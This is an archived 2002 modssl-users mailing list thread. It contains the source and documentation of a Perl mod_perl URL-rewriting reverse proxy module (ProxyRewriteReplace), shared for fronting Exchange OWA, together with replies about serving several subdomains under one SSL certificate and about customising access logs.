    } elsif ($k =~ /Referer/) {
      $v =~ s/.*(https?:\/\/.*)/$1/;
    }
    if ($k =~ /User-Agent/) {
      $client_agent = $v;
    }
    $v = uri_unescape($v);
    $request->header($k,$v);	      
    $r->log->debug("fetch: IN-MOD $k: $v");
  }

  # If we have authorization information and it isn't already filled in
  if ($auth_info && !$request->authorization()) {
    $request->authorization($auth_info);
  }

  if ($r->method eq "POST") {
    my $content;
    if ($r->headers_in->{'Content-type'} eq
'application/x-www-form-urlencoded') {
      $content = $r->content;
    } else {
      $r->read($content, $r->headers_in->{'Content-length'});
    }
    $request->content($content);
    $r->log->debug("fetch: Request type: ", $r->method);
    $r->log->debug("fetch: Request content type: ",
		   $r->headers_in->{'Content-type'});
    $r->log->debug("fetch: Request content: $content");
  }
  
  $r->log->debug("fetch: Product: $Apache::ProxyRewriteReplace::PRODUCT");
  my $ua = new LWP::UserAgent;
  if ($client_agent ne '') {
    $ua->agent("$client_agent; $Apache::ProxyRewriteReplace::PRODUCT");
  } else {
    $ua->agent("$Apache::ProxyRewriteReplace::PRODUCT");
  }
  my $res = $ua->simple_request($request);
  $r->log->info("ProxyRewriteReplace::fetch: Time proxy got document: ",
time);
  $r->log->info("ProxyRewriteReplace::fetch: Original document size: ",
length($res->content));
  $r->log->info("ProxyRewriteReplace::fetch: Original document: ",
$res->content);
  return($res);
}

############################################################################
###
############################################################################
###
# parse: parse HTML and find all embedded URLs
############################################################################
###
############################################################################
###
sub parse {
  my ($r, $remote_site, $response, $shrink_uri, $mapref) = @_;
  my $buf = $response->content;
  my ($lessthanpos, $greaterthanpos, $prediff, $diff, 
      $preblock, $tagblock, $lastblock);
  my $pos = 0;
  my $newbuf = '';
  my $iscomment = 0;
  my $buflen = length($buf);

  while (($lessthanpos = index($buf, "<", $pos)) > -1) {
    # Make a special case out of the comment in case there
    # are nested tags within the comment, such as javascript code
    # fragments. Not necessarily our problem, but it doesn't hurt much
    # to deal with it.
    if (substr($buf, $lessthanpos + 1, 3) eq '!--') {
      $greaterthanpos = index($buf, "-->", $lessthanpos);
      $iscomment = 1;
    } else {
      $greaterthanpos = index($buf, ">", $lessthanpos);
    }
    $prediff = $lessthanpos - $pos;
    $diff = $greaterthanpos - $lessthanpos - 1;
    $preblock = substr($buf, $pos, $prediff + 1);
    $tagblock = substr($buf, $lessthanpos + 1, $diff);
    if ($iscomment == 0) {
      $r->log->debug("parse: Dealing with tag block: $tagblock");
      &dealwithtag($r, $remote_site, \$tagblock, $shrink_uri, $mapref);
      $r->log->debug("parse: Edited tag block: $tagblock");
    } else {
      $r->log->debug("parse: Skipped comment tag block");
      $iscomment = 0;
    }
    $newbuf .= "$preblock$tagblock";
    $pos = $greaterthanpos;
    # If a tag isn't properly closed at the end of a document, we need to
    # force an end to the loop.
    last if ($pos == -1);
  }
  $lastblock = substr($buf, $pos, $buflen);
  $newbuf .= "$lastblock";

  $response->content($newbuf);
}

############################################################################
###
############################################################################
###
# dealwithtag: decides if there a URL in a tag and sends it to be rewritten
############################################################################
###
############################################################################
###
sub dealwithtag {
  my ($r, $remote_site, $tagblock, $shrink_uri, $mapref) = @_;
  my @blocks;
  my ($tag, $lctag, $key, $lckey, $value, $lcvalue, $delay, $tmp, $i);
  my $done = 0;
  my $refresh = 0;

  # Remove spaces around equal signs, eg 'src = bar' becomes 'src=bar'
  $$tagblock =~ s/\s*(=)\s*/$1/g;
  # Remove all other forms of whitespace in block
  $$tagblock =~ s/(\f|\n|\r|\t)+/ /g;
  # Remove leading spaces in block, eg < img ...> becomes 
  $$tagblock =~ s/^\s+//;
  # Remove leading and trailing whitespace within quotes
  $$tagblock =~ s/(=[\"\'])\s*/$1/g;
  $$tagblock =~ s/\s*([\"\'])/$1/g;
  # need to skip "base href="
  $lctag = lc($$tagblock);
  if ($lctag =~ /base href/) {
	$r->log->debug("dealwithtag: skipping base href found in
$$tagblock");
  }
  else {
     @blocks = split(/\s+/, $$tagblock);
     $tag = shift(@blocks);
     #lowercase tag for table comparison
     $lctag = lc($tag);
     if (exists($LINK_ELEMENTS{$lctag})) {
       $$tagblock = $tag;
       for ($i = 0; $i < @blocks; $i++) {
         if ($blocks[$i] =~ /=/) {
           ($key, $value) = split(/=/, $blocks[$i], 2);
           $lckey = lc($key);
           if ($lctag =~ /(applet|img|link|meta|object)/) {
             if (exists($LINK_ELEMENTS{$lctag}{$lckey})) {
               $value =~ s/(\"|\')//g;
	       if ($lctag eq 'meta') {
	         $lcvalue = lc($value);
	         if ($lckey eq 'http-equiv') {
		   if ($lcvalue eq 'refresh') {
		     $refresh = 1;
		   } 
		   $$tagblock .= " $key=\"$value\"";
		   next;
	         } else {
		   # Must be a content key
     		while (!$done && $i < @blocks) {
	    	  $value .= " $blocks[++$i]";
		      if (1 == ($value =~ s/\"//g)) {
		      $done = 1;
		     }
	        }
		   $done = 0;
		   if ($refresh) {
		     $tmp = $value;
		     $value =~ /(\d)+\;\s*url=([^;\s]+)/i;
		     $delay = $1;
		     $value = $2;
		   } else {
		     $$tagblock .= " $key=\"$value\"";
		     next;
		      }
	         }
	       }
	       # deal with potential codebase issues
	       if ($lctag eq 'applet' || $lctag eq 'object') {
	         # Must deal with later
	       } 
            &rewrite_url($r, $remote_site, \$value, $mapref);
	       if ($lctag eq 'meta' && $refresh) {
	         $refresh = 0;
	         $r->headers_out->{'Refresh'} = "$delay; $value";
	         $tmp =~ s/(url=)[^;\s]+/$1$value/i;
	         $value = $tmp;
	       }
	       $$tagblock .= " $key=\"$value\"";
             } else {
	       $$tagblock .= " $blocks[$i]";
	     }
           } elsif ($lckey eq $LINK_ELEMENTS{$lctag}) {
	     $value =~ s/(\"|\')//g;
	     &rewrite_url($r, $remote_site, \$value, $shrink_uri,  $mapref);
	     $$tagblock .= " $key=\"$value\"";
	   } else {
	     $$tagblock .= " $blocks[$i]";
	   }
         } else {
           $$tagblock .= " $blocks[$i]";
         }
       }
     }
  }
}


############################################################################
###
############################################################################
###
# rewrite_url: rewrite URLs as per the mappings hash
############################################################################
###
############################################################################
###
sub rewrite_url {
  my ($r, $remote_site, $url, $shrink_uri, $mapref) = @_;

  $r->log->debug("rewrite_url: Looking at rewriting $$url");
  $r->log->debug("remote_site: $remote_site");
  $r->log->debug("shrink_uri: $shrink_uri");

  if ($shrink_uri eq 'On') {
    # Remove remote_site from URI to get just the relative-from-root
information
    if ($$url =~ s/^$remote_site//) {
      $r->log->debug("rewrite_url: Shrunk to $$url");
    }
  }

  # Ensure we go from most to least specific rewrite
  foreach my $mapping (sort { $b cmp $a } keys(%$mapref)) {
    $r->log->debug("rewrite_url: Testing match of $mapping ",
		   "($$mapref{$mapping})");
    last if ($$url =~ s/^$mapping/$$mapref{$mapping}/);
  }
}

############################################################################
###
############################################################################
###
# replace_text: replace text as per the replacement_texts hash
############################################################################
###
############################################################################
###
sub replace_text {
  my ($r, $response, $replace_ref) = @_;
  my $buf = $response->content;
  my $lookstr = 0;
  my $replacestr = 0;
  $r->log->debug("replace_text: before buf: $buf");
  # Ensure we go from most to least specific rewrite
  foreach $lookstr (sort { $b cmp $a } keys(%$replace_ref)) {
	$replacestr = $$replace_ref{$lookstr};
    $r->log->debug("replace_text: to replace $lookstr with $replacestr");
    $buf =~ s/$lookstr/$replacestr/g;
  }  
  $r->log->debug("replace_text: after buf: $buf");
  $response->content($buf); 
  $r->log->debug("replace_text: after content: $response->content");
}

############################################################################
###
############################################################################
###
# respond: respond to the client
############################################################################
###
############################################################################
###
sub respond {
  my ($r, $remote_site, $remote_location, $auth_redirect, 
      $response, $mapref, $replace_ref) = @_;
  my $parsed_uri = Apache::URI->parse($r);

  $r->log->debug("respond: URI: ", $r->uri);
  $r->log->debug("respond: Parsed hostinfo: ", $parsed_uri->hostinfo());

  # feed reponse back into our request_record
  $response->scan(sub {
		    my ($header, $value) = @_;
		    $r->log->debug("respond: OUT $header: $value");
		    if ($header =~ /^Set-Cookie/i) {
		      $value =~ /path=([^;]+)/i;
		      my $cookie_path = $1;
		      &rewrite_url($r, $remote_site, \$cookie_path,
$mapref);
		      $value =~ s/(path=)([^;]+)/$1$cookie_path/i;
		      $r->log->debug("respond: OUT-MOD $header: $value");
		    }
		    $r->headers_out->{$header} = $value;
		  });
  $r->content_type($response->header('Content-type'));
  $r->status($response->code);
  $r->status_line(join " ", $response->code, $response->message);
  
  # deal with redirects
  if ($r->status =~ /(301|302)/) {
    my $location = $response->header('Location');
    &rewrite_url($r, $remote_site, \$location, $mapref);
    # Only modify location is rewritten URL is relative
    unless ($location =~ m!://!) {
      $location = $parsed_uri->scheme . '://' . $parsed_uri->hostinfo . 
	$location;
    }
    $r->log->debug("respond: Location: $location");
    $r->headers_out->{'Location'} = $location;
  } 

  # deal with auth required redirects
  if ($r->status == 401 && $auth_redirect =~ /^on$/i) {
    my $base = $r->location();
    my $location = '';
    if ($base ne '/') {
      ($location = $r->uri) =~ s/^$base//;
    } else {
      $location = $r->uri;
    }
    $location = $remote_location . $location;
    $r->status('302');
    $r->status_line(join " ", '302', 'Moved Temporarily');
    $r->log->debug("respond: Location: $location");
    $r->headers_out->{'Location'} = $location;
    $response->content(undef);
  }

  &replace_text($r, $response, $replace_ref);

  if (length($response->content) != 0) {
    $r->headers_out->{'Content-length'} = length($response->content);
  } else {
    # HEAD request, must populate with what backend said
    $r->headers_out->{'Content-length'} = length($response->content);
  }

  $r->log->debug("respond: Status: ", $r->status);
  $r->log->debug("respond: Status Line: ", $r->status_line);
  $r->log->debug("respond: Final Content: ", $response->content);

  $r->send_http_header();

  $r->print($response->content);
}

1;

__END__

# Documentation - try 'pod2text ProxyRewriteReplace'

=head1 NAME

Apache::ProxyRewriteReplace - mod_perl URL-rewriting proxy

=head1 SYNOPSIS

 
 SetHandler   perl-script
 PerlHandler  Apache::ProxyRewriteReplace

 PerlSetVar   ProxyTo           http://www.tivoli.com
 PerlSetVar   ProxyAuthInfo     "BASIC aGb2c3ewenQ6amF4szzmY3b="
 PerlSetVar   ProxyAuthRedirect On
 PerlSetVar   ProxyRewriteReplace      "https://www.tivoli.com/secure =>
/secure"
 

 
 SetHandler   perl-script
 PerlHandler  Apache::ProxyRewriteReplace

 PerlSetVar   ProxyTo           https://www.tivoli.com/secure
 PerlSetVar   ProxyAuthInfo     "BASIC aGb2c3ewenQ6amF4szzmY3b="
 PerlSetVar   ProxyAuthRedirect Off
 PerlSetVar   ProxyRewriteReplace      "http://www.tivoli.com/ => /"
 

=head1 DESCRIPTION

B acts as a reverse-proxy that will rewrite
URLs embedded in HTML documents per apache configuration
directives.

This module was written to allow multiple backend services with
discrete URLs to be presented as one service and to allow the
proxy to do authentication on the client's behalf.

=head1 CONFIGURATION OPTIONS

The following variables can be defined within the configration of
Directory, Location, or Files blocks.

=over 4

=item B

The URL for which ProxyRewriteReplace will proxy its requests.

=back

=over 4

=item B

Authorization information for proxied requests. This string must
conform to the credentials string defined in section 11 of RFC
2068.

=back

=over 4

=item B

If the credentials supplied in the ProxyAuthInfo directive are
insufficient and if ProxyAuthRedirect is set to On, the proxy
server will redirect the client directly to the backend host. If
ProxyAuthRedirect is set to Off (the default), the proxy server
will challenge the client on the remote server's behalf.

=back

=over 4

=item B

A hash of URLs to rewrite. A note on hashes in configuration
directives from the "Writing Apache Modules with Perl and C"
book page 287:

  The only trick is to remember to put double quotes around the
  configuration value if it contains whitespace and not to allow
  your text editor to wrap it to another line. You can use
  backslash as a continuation character if you find long lines a
  pain to read.

=back

=head1 NOTES

=over 4

=item B

ProxyRewriteReplace automatically adds a mapping for the remote relative
URI and the current location. An example:

  ServerName   proxyhost

  
  PerlSetVar   ProxyTo   http://server1/A
  

The request for http://proxyhost/foo/B is proxied to
http://server1/A/B. Within the response from server1 is an
embedded URI /A/C. This URI is rewritten to /foo/C before being
returned to the client.

=back

=over 4

=item B

Embedded languages such as Javascript are not parsed for embedded
URLs. The problem is NP-Complete. The best choice is to surround
all embedded languages in HTML comments to avoid possible parsing
problems.

=back

=over 4

=item B

The parser takes a single pass through each HTML document. This
method is extremely efficient, but it has possible drawbacks with
poorly constructed HTML. All known drawbacks have been
eliminated, but more may exist. Please contact the author if you
have any trouble with parsed output.

=back

=over 4

=item B


=back

=head1 AVAILABILITY

=head1 AUTHOR


=head1 SEE ALSO

httpd(8), mod_perl(1)

=head1 COPYRIGHT


=cut

############################################################################
###
############################################################################
###
# $Log: ProxyRewriteReplace.pm,v $
#
# Revision 0.1  2001/10/22 23:51:20  dmarshall
# initial version from ProxyRewrite
#
############################################################################
###
############################################################################
###


-----Original Message-----
From: Peter Viertel [mailto:peter.viertel@itaction.co.uk]
Sent: Wednesday, June 12, 2002 5:35 AM
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?


thats basically right.

the proxy spec in http/1.1 etc copes with rewriting headers - but 
nothing I've seen rewrites the actual html content - this would be 
possible of course, but there would have to be a new module for apache 
to do it, and architecturally you'd be creating a potential bottleneck 
as the proxy server would have to parse all of the content passing 
through it.

Wim Godden wrote:

>So there's no system which allows me to really proxy pages and 'modify'
them so
>that all future connections go through this 'proxy' as well ?
>
>Greetings,
>
>Wim
>
>Peter Viertel wrote:
>
>  
>
>>yes, i think thats whats happening - you need to review the website
>>content you are pointing at. For this to work you can't have any
>>absolute hrefs, and also the backend site may issue redirects, for these
>>to work you need a ProxyPassReverse which will rewrite the Location:
>>header on any redirects the backend site may send.
>>
>> For example:
>>
>>ProxyPass /test    http://other.subdomain.ourdomain.com/
>>ProxyPassReverse /test  http://other.subdomain.ourdomain.com/
>>
>>proxypassreverse unfortunately is not case insensitive, and the backend
>>webserver may refer to itself canonically, so the location headers may
>>have another hostname. Either fix up the backend webserver to match the
>>proxypassreverse, or add extra proxypassreverse lines.
>>
>>The most common cause of redirects is the / bug handlers of tomcat, and
>>IIS which kick in if your url ends with / and that resolves to a
>>directory, then the webserver looks up what the directoryindex script is
>>(eg. index.html) and sends a redirect. This is something to do with
>>early revision browser releases, I have no idea which ones or if it
>>matters anymore.
>>
>>Also note that mod_proxy got a big upgrade at apache release 1.3.23 that
>>may help things along too in certain cases.
>>
>>John.Airey@rnib.org.uk wrote:
>>
>>    
>>
>>>Sounds like you have some absolute links rather than relative links. You
can
>>>also use
>>>proxypass /test https://other-subdomain.ourdomain.com
>>>
>>>If the data needs to be secured between the proxy and the destination
>>>server.
>>>
>>>-
>>>John Airey
>>>Internet systems support officer, ITCSD, Royal National Institute of the
>>>Blind,
>>>Bakewell Road, Peterborough PE2 6XU,
>>>Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
>>>
>>>Is the statement 'There is no such thing as truth'  true?
>>>
>>>
>>>
>>>
>>>      
>>>
>>>>-----Original Message-----
>>>>From: Wim Godden [mailto:wim@godden.net]
>>>>Sent: 12 June 2002 11:06
>>>>To: modssl-users@modssl.org
>>>>Subject: Re: 1 certificate for several sites using redirection ?
>>>>
>>>>
>>>>proxypass /test http://other-subdomain.ourdomain.com
>>>>doesn't work properly... I get errors about the images being
>>>>insecure and all links
>>>>point to the wrong position.
>>>>
>>>>
>>>>Peter Viertel wrote:
>>>>
>>>>
>>>>
>>>>        
>>>>
>>>>>You could do that using reverse proxy, ie mod_proxy.
>>>>>Redirects are not going to help.
>>>>>
>>>>>Wim Godden wrote:
>>>>>
>>>>>
>>>>>
>>>>>          
>>>>>
>>>>>>Hi,
>>>>>>
>>>>>>I'd like to use a certificate to secure several of our
>>>>>>
>>>>>>
>>>>>>            
>>>>>>
>>>>subdomains...
>>>>
>>>>
>>>>        
>>>>
>>>>>>buying hundreds of certificates is simply too expensive.
>>>>>>Is there some way to do this :
>>>>>>
>>>>>>- Install certificate on secure.ourdomain.com
>>>>>>- Let people surf to
>>>>>>
>>>>>>
>>>>>>            
>>>>>>
>>>>>https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
>>>>>
>>>>>
>>>>>          
>>>>>
>>>at-ever-page.html
>>>
>>>
>>>      
>>>
>>>>>Thanks in advance.
>>>>>
>>>>>
>>>>>Greetings,
>>>>>
>>>>>Wim Godden
>>>>>
>>>>>______________________________________________________________________
>>>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>>Automated List Manager                            majordomo@modssl.org
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>          
>>>>>
>>>>______________________________________________________________________
>>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>Automated List Manager                            majordomo@modssl.org
>>>>
>>>>
>>>>        
>>>>
>>>--
>>>------
>>>Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief
hoogstaande
>>>sites !
>>>
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>-
>>>
>>>NOTICE: The information contained in this email and any attachments is
>>>confidential and may be legally privileged. If you are not the
>>>intended recipient you are hereby notified that you must not use,
>>>disclose, distribute, copy, print or rely on this email's content. If
>>>you are not the intended recipient, please notify the sender
>>>immediately and then delete the email and any attachments from your
>>>system.
>>>
>>>RNIB has made strenuous efforts to ensure that emails and any
>>>attachments generated by its staff are free from viruses. However, it
>>>cannot accept any responsibility for any viruses which are
>>>transmitted. We therefore recommend you scan all attachments.
>>>
>>>Please note that the statements and views expressed in this email
>>>and any attachments are those of the author and do not necessarily
>>>represent those of RNIB.
>>>
>>>RNIB Registered Charity Number: 226227
>>>
>>>Website: http://www.rnib.org.uk
>>>
>>>14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk
to
>>>find out all about it.
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>>      
>>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>    
>>
>
>--
>------
>Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
sites
>!
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 16:47:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00851; Wed, 12 Jun 2002 16:46:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from godden.net id QAA00825; Wed, 12 Jun 2002 16:45:54 +0200 (MET DST)
Received: (qmail 25463 invoked from network); 12 Jun 2002 14:45:50 -0000
Received: from unknown (HELO godden.net) (10.0.0.3)
  by 0 with SMTP; 12 Jun 2002 14:45:50 -0000
Message-ID: <3D075E99.C11986FC@godden.net>
Date: Wed, 12 Jun 2002 16:45:45 +0200
From: Wim Godden 
Organization: FirstLink Networks
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <691874941F1F954198F7E7FCBAEF1FAE0D1FF8@exchange00.SC.ESILICON.COM>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Wim Godden 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi David,

Thanks, but does this require Mod_perl as I haven't got that install (it eats
too much resources).

Greetings,

Wim

David Marshall wrote:

> To rewrite content you might look at the Perl module Apache::ProxyRewrite. I
> was given an assignment to Front-end MS EXCHANGE OWA with Apache HTTPS.
> After review of options, I took a copy of the Perl module
> Apache::ProxyRewrite and added the ability to ReplaceText in the content as
> well, I renamed it ProxyRewriteReplace. This was my 1st excursion into Perl
> and I've never gotten the time to fully complete/test the module (example,
> the documentation is from ProxyReplace). I also only tested it as far as to
> meet our objective of Proxying MS Exchange. I don;t know if this will help,
> but I've included my ProxyRewriteReplace source.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 16:59:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA01444; Wed, 12 Jun 2002 16:58:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id QAA01405; Wed, 12 Jun 2002 16:57:31 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Wed, 12 Jun 2002 07:57:25 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1FFA@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: 1 certificate for several sites using redirection ?
Date: Wed, 12 Jun 2002 07:57:25 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes

-----Original Message-----
From: Wim Godden [mailto:wim@godden.net]
Sent: Wednesday, June 12, 2002 7:46 AM
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?


Hi David,

Thanks, but does this require Mod_perl as I haven't got that install (it
eats
too much resources).

Greetings,

Wim

David Marshall wrote:

> To rewrite content you might look at the Perl module Apache::ProxyRewrite.
I
> was given an assignment to Front-end MS EXCHANGE OWA with Apache HTTPS.
> After review of options, I took a copy of the Perl module
> Apache::ProxyRewrite and added the ability to ReplaceText in the content
as
> well, I renamed it ProxyRewriteReplace. This was my 1st excursion into
Perl
> and I've never gotten the time to fully complete/test the module (example,
> the documentation is from ProxyReplace). I also only tested it as far as
to
> meet our objective of Proxying MS Exchange. I don;t know if this will
help,
> but I've included my ProxyRewriteReplace source.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 17:00:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA01495; Wed, 12 Jun 2002 16:59:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id QAA01470; Wed, 12 Jun 2002 16:58:47 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Wed, 12 Jun 2002 07:58:41 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1FFB@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: 1 certificate for several sites using redirection ?..2
Date: Wed, 12 Jun 2002 07:58:41 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes. What are your resource constraints?

-----Original Message-----
From: Wim Godden [mailto:wim@godden.net]
Sent: Wednesday, June 12, 2002 7:46 AM
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?


Hi David,

Thanks, but does this require Mod_perl as I haven't got that install (it
eats
too much resources).

Greetings,

Wim

David Marshall wrote:

> To rewrite content you might look at the Perl module Apache::ProxyRewrite.
I
> was given an assignment to Front-end MS EXCHANGE OWA with Apache HTTPS.
> After review of options, I took a copy of the Perl module
> Apache::ProxyRewrite and added the ability to ReplaceText in the content
as
> well, I renamed it ProxyRewriteReplace. This was my 1st excursion into
Perl
> and I've never gotten the time to fully complete/test the module (example,
> the documentation is from ProxyReplace). I also only tested it as far as
to
> meet our objective of Proxying MS Exchange. I don;t know if this will
help,
> but I've included my ProxyRewriteReplace source.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 17:14:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA02707; Wed, 12 Jun 2002 17:13:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from godden.net id RAA02694; Wed, 12 Jun 2002 17:13:01 +0200 (MET DST)
Received: (qmail 30104 invoked from network); 12 Jun 2002 15:12:55 -0000
Received: from unknown (HELO godden.net) (10.0.0.3)
  by 0 with SMTP; 12 Jun 2002 15:12:55 -0000
Message-ID: <3D0764F2.39CC1630@godden.net>
Date: Wed, 12 Jun 2002 17:12:50 +0200
From: Wim Godden 
Organization: FirstLink Networks
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?..2
References: <691874941F1F954198F7E7FCBAEF1FAE0D1FFB@exchange00.SC.ESILICON.COM>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Wim Godden 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well, the problem is that, when I install Mod_perl, each Apache process uses
several MBytes more... and I don't have anything to spare anymore.



David Marshall wrote:

> Yes. What are your resource constraints?
>
> -----Original Message-----
> From: Wim Godden [mailto:wim@godden.net]
> Sent: Wednesday, June 12, 2002 7:46 AM
> To: modssl-users@modssl.org
> Subject: Re: 1 certificate for several sites using redirection ?
>
> Hi David,
>
> Thanks, but does this require Mod_perl as I haven't got that install (it
> eats
> too much resources).
>
> Greetings,
>
> Wim
>
> David Marshall wrote:
>
> > To rewrite content you might look at the Perl module Apache::ProxyRewrite.
> I
> > was given an assignment to Front-end MS EXCHANGE OWA with Apache HTTPS.
> > After review of options, I took a copy of the Perl module
> > Apache::ProxyRewrite and added the ability to ReplaceText in the content
> as
> > well, I renamed it ProxyRewriteReplace. This was my 1st excursion into
> Perl
> > and I've never gotten the time to fully complete/test the module (example,
> > the documentation is from ProxyReplace). I also only tested it as far as
> to
> > meet our objective of Proxying MS Exchange. I don;t know if this will
> help,
> > but I've included my ProxyRewriteReplace source.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
------
Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande sites
!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 17:19:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03082; Wed, 12 Jun 2002 17:18:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from gold.nb.net id RAA02943; Wed, 12 Jun 2002 17:17:04 +0200 (MET DST)
Received: (qmail 6719 invoked from network); 12 Jun 2002 15:17:03 -0000
Received: from radon.nb.net (HELO nb.net) (209.161.64.51)
  by gold.nb.net with SMTP; 12 Jun 2002 15:17:03 -0000
Message-ID: <3D0765F0.7E3A2026@nb.net>
Date: Wed, 12 Jun 2002 11:17:06 -0400
From: Gary Pitman 
X-Mailer: Mozilla 4.78 (Macintosh; U; PPC)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: access-log
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gary Pitman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

How can you customize the output to the apache access-log on a ssl
connection. I am trying to use awstats and the ssl connections do not
report the browser/os type and awstats gets mad about that. 
My httpd.conf does not have a seperate directive for the access-log in
the ssl section but I get different output to the log.

-Gary
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
